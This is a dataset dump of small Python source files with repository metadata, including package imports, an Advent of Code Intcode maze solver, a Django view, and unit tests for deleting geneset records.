| 7.5 | 32 | 0.755556 | 3 | 45 | 11.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 45 | 5 | 33 | 9 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
a876a33ab224f10f56b6bfb6b4d40b58f60579c8 | 36 | py | Python | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 43 | 2016-02-29T17:44:57.000Z | 2021-12-28T00:41:47.000Z | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 9 | 2016-02-29T23:38:36.000Z | 2016-09-02T21:48:00.000Z | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 10 | 2016-02-29T16:53:09.000Z | 2018-12-12T00:06:08.000Z | from .unix_daemon import UnixDaemon
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a87b99387f990ce1ed3b76291f317bae744cd188 | 76 | py | Python | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | from ._DetectObjectGridService import *
from ._DetectObjectService import *
| 25.333333 | 39 | 0.842105 | 6 | 76 | 10.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 76 | 2 | 40 | 38 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8aafab8f317d3c72ce53356279be7bb07616c9c | 8,006 | py | Python | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | import time
from Day09 import IntcodeComputer
PUZZLE_INPUT = input("> ")
INTCODE = [int(x) for x in PUZZLE_INPUT.split(",")]
### PART 1 attempt 1 - non-functional
##def print_maze(maze, dpos=None, path=[]):
## xrange = {pos[0] for pos in maze.keys()}
## yrange = {pos[1] for pos in maze.keys()}
## xmin, xmax = min(xrange), max(xrange)
## ymin, ymax = min(yrange), max(yrange)
## s = "="*(xmax-xmin+1)+"\n"
## for y in range(ymax, ymin-1, -1):
## for x in range(xmin, xmax+1, 1):
## if (x, y) == dpos: s += "D"; continue
## if (x, y) in path: s += "@"; continue
## m = maze.get((x, y), -1)
## if m == -1: s += " "
## elif m == 0: s += "#"
## elif m == 1: s += "."
## elif m == 2: s += "*"
## elif m == 3: s += "0"
## else: s += "?"
## s += "\n"
## s += "="*(xmax-xmin+1)
## print(s+"\n", end="")
##def convdir(x):
## if x%4 == 1: return 1 # N
## elif x%4 == 2: return 4 # E
## elif x%4 == 3: return 2 # S
## elif x%4 == 0: return 3 # W
##
##pos = (0, 0)
##maze = {pos: 3}
##i = IntcodeComputer(INTCODE)
##OXLOC = None
##nextdir = 1
##iteration = 0
##while True:
## if iteration%100 == 0: print_maze(maze, pos)
## iteration += 1
##
## nextdir %= 4
## if nextdir % 4 == 1: # N
## newpos = (pos[0], pos[1] + 1)
## elif nextdir % 4 == 2: # E
## newpos = (pos[0] + 1, pos[1])
## elif nextdir % 4 == 3: # S
## newpos = (pos[0], pos[1] - 1)
## elif nextdir % 4 == 0: # W
## newpos = (pos[0] - 1, pos[1])
##
## i.queue[0].append(convdir(nextdir))
## i.run_until_input()
## code = i.queue[1].pop(0)
##
## #print(pos, DIRNAMES[nextdir%4], code, newpos)
##
## if code == 0:
## if newpos not in maze.keys():
## maze[newpos] = 0
## nextdir += 1
## elif code == 1:
## pos = newpos
## if pos == (0, 0) and OXLOC is not None:
## break
## if pos not in maze.keys():
## maze[pos] = 1
## nextdir -= 1
## elif code == 2:
## maze[newpos] = 2
## OXLOC = newpos
##
##print_maze(maze)
##
##def dist_to_go(pos): return abs(pos[0]-OXLOC[0])+abs(pos[1]-OXLOC[1])
##def neighbours(pos): return [p for p in [(pos[0], pos[1]+1),
## (pos[0]+1, pos[1]),
## (pos[0], pos[1]-1),
## (pos[0]-1, pos[1])]\
## if maze.get(p, 0) != 0]
##
### A*-ish algorithm
##pos = 0
##checked = {}
##to_check = [((0, 0), 0, None)]
##iteration = 0
##while True:
## iteration += 1
## to_check.sort(key=lambda x: dist_to_go(x[0]))
##
## pos, d, from_ = to_check.pop(0)
## if pos == OXLOC:
## checked[pos] = (from_, d)
## break
## nbrs = neighbours(pos)
## for n in nbrs:
## if n not in checked.keys():
## to_check.append((n, d+1, pos))
## checked[pos] = (from_, d)
##
## if iteration%2 == 0:
## chain = []
## chainfrom = from_
## while chainfrom not in [None, (0, 0)]:
## chain.append(chainfrom)
## chainfrom, _ = checked[chainfrom]
## print_maze(maze, path=chain)
##### Brute-force algorithm
####pos = 0
####checked = {}
####to_check = [((0, 0), 0, None)]
####iteration = 0
####while True:
#### iteration += 1
#### to_check.sort(key=lambda x: x[1])
####
#### pos, d, from_ = to_check.pop(0)
#### if pos == OXLOC:
#### checked[pos] = (from_, d)
#### break
#### nbrs = neighbours(pos)
#### for n in nbrs:
#### if n not in checked.keys():
#### to_check.append((n, d+1, pos))
#### checked[pos] = (from_, d)
####
#### if iteration%5 == 0:
#### chain = []
#### chainfrom = from_
#### while chainfrom not in [None, (0, 0)]:
#### chain.append(chainfrom)
#### chainfrom, _ = checked[chainfrom]
#### print_maze(maze, path=chain)
##
##chain = []
##chainfrom, n = checked[OXLOC]
##print(n)
##while chainfrom != (0, 0):
## chain.append(chainfrom)
## chainfrom, n = checked[chainfrom]
## print(n)
##print_maze(maze, path=chain)
##print(checked[OXLOC][1])
# PART 1 attempt 2 - functional
def print_maze(maze, dpos=None, path=[]):
xrange = {pos[0] for pos in maze.keys()}
yrange = {pos[1] for pos in maze.keys()}
xmin, xmax = min(xrange), max(xrange)
ymin, ymax = min(yrange), max(yrange)
s = "="*(xmax-xmin+1)+"\n"
for y in range(ymax, ymin-1, -1):
for x in range(xmin, xmax+1, 1):
if (x, y) == dpos: s += "D"; continue
if (x, y) == (0,0): s += "0"; continue
if (x, y) == OXLOC: s += "*"; continue
if (x, y) in path: s += "@"; continue
m = maze.get((x, y), -1)
if m == -1: s += " "
            elif m is None: s += "#"
else: s += "."
s += "\n"
s += "="*(xmax-xmin+1)
print(s+"\n", end="")
def convdir(x):
if x%4 == 1: return 1 # N
elif x%4 == 2: return 4 # E
elif x%4 == 3: return 2 # S
elif x%4 == 0: return 3 # W
pos = (0, 0)
pscore = 0
maze = {pos: pscore}
i = IntcodeComputer(INTCODE)
OXLOC = None
nextdir = 1
iteration = 0
while True:
if iteration%100 == 0: print_maze(maze, pos)
iteration += 1
nextdir %= 4
if nextdir % 4 == 1: # N
newpos = (pos[0], pos[1] + 1)
elif nextdir % 4 == 2: # E
newpos = (pos[0] + 1, pos[1])
elif nextdir % 4 == 3: # S
newpos = (pos[0], pos[1] - 1)
elif nextdir % 4 == 0: # W
newpos = (pos[0] - 1, pos[1])
i.queue[0].append(convdir(nextdir))
i.run_until_input()
code = i.queue[1].pop(0)
#print(pos, DIRNAMES[nextdir%4], code, newpos)
if code == 0:
if newpos not in maze.keys():
maze[newpos] = None
nextdir += 1
elif code == 1:
pos = newpos
if pos not in maze.keys():
pscore += 1
maze[pos] = pscore
else:
pscore = maze[pos]
nextdir -= 1
elif code == 2:
pscore += 1
maze[newpos] = pscore
pos = OXLOC = newpos
break
ANSWER_P1 = pscore
# PART 2
def print_maze_p2(maze):
xrange = {pos[0] for pos in maze.keys()}
yrange = {pos[1] for pos in maze.keys()}
xmin, xmax = min(xrange), max(xrange)
ymin, ymax = min(yrange), max(yrange)
s = "="*(xmax-xmin+1)+"\n"
for y in range(ymax, ymin-1, -1):
for x in range(xmin, xmax+1, 1):
if (x, y) == (0,0): s += "0"; continue
if (x, y) == OXLOC: s += "*"; continue
m = maze.get((x, y), -1)
if m == -1: s += " "
            elif m is None: s += "#"
elif m == False: s += "."
else: s += "@"
s += "\n"
s += "="*(xmax-xmin+1)
print(s+"\n", end="")
pscore = 0
maze = {p: (False if isinstance(maze[p], int) else maze[p]) for p in maze.keys()}
maze[pos] = 0
nextdir = 1
iteration = 0
while False in maze.values():
if iteration%500 == 0: print_maze_p2(maze)
iteration += 1
nextdir %= 4
if nextdir % 4 == 1: # N
newpos = (pos[0], pos[1] + 1)
elif nextdir % 4 == 2: # E
newpos = (pos[0] + 1, pos[1])
elif nextdir % 4 == 3: # S
newpos = (pos[0], pos[1] - 1)
elif nextdir % 4 == 0: # W
newpos = (pos[0] - 1, pos[1])
i.queue[0].append(convdir(nextdir))
i.run_until_input()
code = i.queue[1].pop(0)
#print(pos, DIRNAMES[nextdir%4], code, newpos)
if code == 0:
if newpos not in maze.keys():
maze[newpos] = None
nextdir += 1
elif code in (1, 2):
pos = newpos
if maze.get(pos, False) == False:
pscore += 1
maze[pos] = pscore
else:
pscore = maze[pos]
nextdir -= 1
ANSWER_P2 = max([m for m in maze.values() if isinstance(m, int)])
print(ANSWER_P1)
print(ANSWER_P2)
| 28.390071 | 81 | 0.470022 | 1,134 | 8,006 | 3.277778 | 0.089065 | 0.02798 | 0.032284 | 0.031477 | 0.806833 | 0.779123 | 0.762443 | 0.762443 | 0.762443 | 0.750067 | 0 | 0.046684 | 0.325756 | 8,006 | 281 | 82 | 28.491103 | 0.641904 | 0.476393 | 0 | 0.68595 | 0 | 0 | 0.008351 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024793 | false | 0 | 0.016529 | 0 | 0.041322 | 0.066116 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a8bf0a139eae0fd3a67cfe76e9a85102b9195ccf | 128 | py | Python | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | 1 | 2021-05-12T18:44:30.000Z | 2021-05-12T18:44:30.000Z | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | 2 | 2021-09-22T18:41:37.000Z | 2022-02-10T09:28:52.000Z | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request,'base/index.html')
| 21.333333 | 44 | 0.757813 | 18 | 128 | 5.388889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 5 | 45 | 25.6 | 0.881818 | 0.179688 | 0 | 0 | 0 | 0 | 0.145631 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
a8c0ae6f23a53a3960fb3870eec630317839b6ec | 139 | py | Python | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | null | null | null | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | null | null | null | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | 1 | 2021-09-12T15:34:13.000Z | 2021-09-12T15:34:13.000Z | # This is a comment in my code; it does nothing
# This is a comment in the code; the code does not run.
# print('Hello world')
# print("Hello world")
# No output is printed.
| 23.166667 | 46 | 0.690647 | 25 | 139 | 3.84 | 0.84 | 0.208333 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201439 | 139 | 5 | 47 | 27.8 | 0.864865 | 0.920863 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7666a4fd2f42b40394c03761fffc031a15560eb0 | 46 | py | Python | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | from .get_weight import *
from .model import * | 23 | 25 | 0.76087 | 7 | 46 | 4.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 2 | 26 | 23 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4f18e0612ba16e8a9cc030ce7148efc0df05ce53 | 7,344 | py | Python | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 16 | 2020-05-12T23:25:51.000Z | 2021-06-17T12:04:13.000Z | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 943 | 2020-05-11T18:03:59.000Z | 2021-08-18T21:57:51.000Z | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 2 | 2020-12-19T10:04:24.000Z | 2021-06-19T12:38:23.000Z | import json
from backend.corpora.common.corpora_orm import CollectionVisibility
from backend.corpora.common.entities.geneset import GenesetDatasetLink
from tests.unit.backend.corpora.api_server.base_api_test import BaseAuthAPITest, BasicAuthAPITestCurator
from tests.unit.backend.corpora.api_server.mock_auth import get_auth_token
from tests.unit.backend.fixtures.mock_aws_test_case import CorporaTestCaseUsingMockAWS
class TestGenesets(BaseAuthAPITest, CorporaTestCaseUsingMockAWS):
def setUp(self):
# Needed for proper setUp resolution in multiple inheritance
super().setUp()
def tearDown(self):
super().tearDown()
def _get_geneset_ids(self, collection_id, headers, public=False):
if public:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}", headers=headers)
else:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, rsp.status_code)
bdy = json.loads(rsp.data)
return [g["id"] for g in bdy.get("genesets", [])]
def _delete_geneset_test(self, collection_id, headers, geneset):
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
# try to get geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertNotIn(geneset.id, actual_geneset_ids)
# Delete a seconds time
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
def test__delete_geneset_ACCEPTED(self):
"""
Delete a geneset from a private collection.
"""
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="test_user_id"
)
with self.subTest("With collection"):
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
self._delete_geneset_test(collection.id, headers, geneset)
with self.subTest("With dataset"):
# create dataset
dataset = self.generate_dataset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
GenesetDatasetLink.create(self.session, geneset.id, dataset.id)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
self._delete_geneset_test(collection.id, headers, geneset)
# get dataset
response = self.app.get(f"/dp/v1/collections/{collection.id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, response.status_code)
body = json.loads(response.data)
self.assertIn(dataset.id, [d["id"] for d in body.get("datasets", [])])
def test__delete_gene_set__UNAUTHORIZED(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="some_one_else"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(403, response.status_code)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
def test__delete_gene_set__NOT_ALLOWED(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PUBLIC, owner="test_user_id"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers, True)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(405, response.status_code)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers, True)
self.assertIn(geneset.id, actual_geneset_ids)
class TestGenesetsCurators(BasicAuthAPITestCurator, CorporaTestCaseUsingMockAWS):
def _get_geneset_ids(self, collection_id, headers, public=False):
if public:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}", headers=headers)
else:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, rsp.status_code)
bdy = json.loads(rsp.data)
return [g["id"] for g in bdy.get("genesets", [])]
def test__delete_gene_set__200(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="some_one_else"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
| 42.450867 | 110 | 0.683415 | 859 | 7,344 | 5.614668 | 0.123399 | 0.085009 | 0.086253 | 0.062202 | 0.802198 | 0.784367 | 0.777939 | 0.763011 | 0.763011 | 0.763011 | 0 | 0.006461 | 0.22018 | 7,344 | 172 | 111 | 42.697674 | 0.835691 | 0.058279 | 0 | 0.642857 | 0 | 0 | 0.074225 | 0.053413 | 0 | 0 | 0 | 0 | 0.196429 | 1 | 0.080357 | false | 0 | 0.053571 | 0 | 0.169643 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4f9b5cdc4ed81f275e9d7100f8b7e2f71c76e1b7 | 69 | py | Python | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | 3 | 2017-01-20T08:51:54.000Z | 2018-09-22T14:54:06.000Z | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | null | null | null | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | 2 | 2019-05-06T17:36:36.000Z | 2022-01-24T14:15:31.000Z | """TODO: Document your package."""
from .version import __version__
| 17.25 | 34 | 0.73913 | 8 | 69 | 5.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 69 | 3 | 35 | 23 | 0.783333 | 0.405797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96ca28de558d7c5152a031451428f2cc2f2fbb82 | 174 | py | Python | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_ckeditor import CKEditor
from flask_moment import Moment
| 29 | 39 | 0.885057 | 25 | 174 | 5.96 | 0.32 | 0.302013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114943 | 174 | 5 | 40 | 34.8 | 0.967532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96ce5ea24a2868fdbb87c58309e3e8d3cfbca726 | 23 | py | Python | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 175 | 2021-03-04T15:46:25.000Z | 2022-03-31T05:56:58.000Z | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 15 | 2021-03-06T17:53:56.000Z | 2022-03-24T17:02:07.000Z | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 39 | 2021-03-04T15:46:26.000Z | 2022-03-09T15:37:12.000Z | from .VNPR import VNPR
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96da45312ec1aa57af58ae723e6a3c3af3ffee91 | 301 | py | Python | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | #src/models/__init__.py
"""
Tic-Toc-Toe
------------------------------------------------------------------------
__init__
------------------------------------------------------------------------
"""
from .VelhaModel import MovementSchema
| 30.1 | 77 | 0.232558 | 12 | 301 | 5.166667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.245847 | 301 | 9 | 78 | 33.444444 | 0.273128 | 0.694352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96f67d27feb531f37b05179f2f06ca347483e0b8 | 26 | py | Python | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | from Permit import Permit
| 13 | 25 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
